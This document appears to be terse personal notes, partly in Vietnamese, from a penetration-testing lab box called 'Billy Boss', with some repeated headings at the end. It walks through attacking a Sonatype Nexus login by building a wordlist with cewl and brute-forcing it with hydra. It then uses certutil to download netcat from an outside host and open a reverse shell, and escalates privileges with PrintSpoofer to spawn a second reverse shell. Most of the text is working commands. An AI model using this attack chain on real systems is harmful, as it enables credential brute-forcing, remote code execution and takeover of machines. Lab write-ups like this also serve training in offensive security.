Billy Boss - create wordlist - grep wordlist

Enumeration

Nmap Port 80 ko có gì Sang port 8081 Có chỗ login Default credential ko ra

Tips wordlist

Cd vào thư mục seclist Gõ grep -r "Sonatype Nexus"

xài cewl cewl --lowercase http://192.168.160.61:8081/ | grep -v CeWL > wordlists.txt

brute force

 hydra -I -f -L wordlists.txt -P wordlists.txt "http-po│
st-form://192.168.107.61:8081/service/rapture/session:username=^USER64│
^&password=^PASS64^:F=403"

Command

URL='http://192.168.107.61:8081'
CMD='cmd.exe /c certutil -urlcache -f http://192.168.45.198/nc.exe nc.exe && nc.exe -e cmd 192.168.45.198 1337'

reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s

PrintSpoofer.exe -c "nc.exe -e cmd.exe <LHOST> <LPORT>"

Enumeration​

Tips wordlist​

Enumeration

Tips wordlist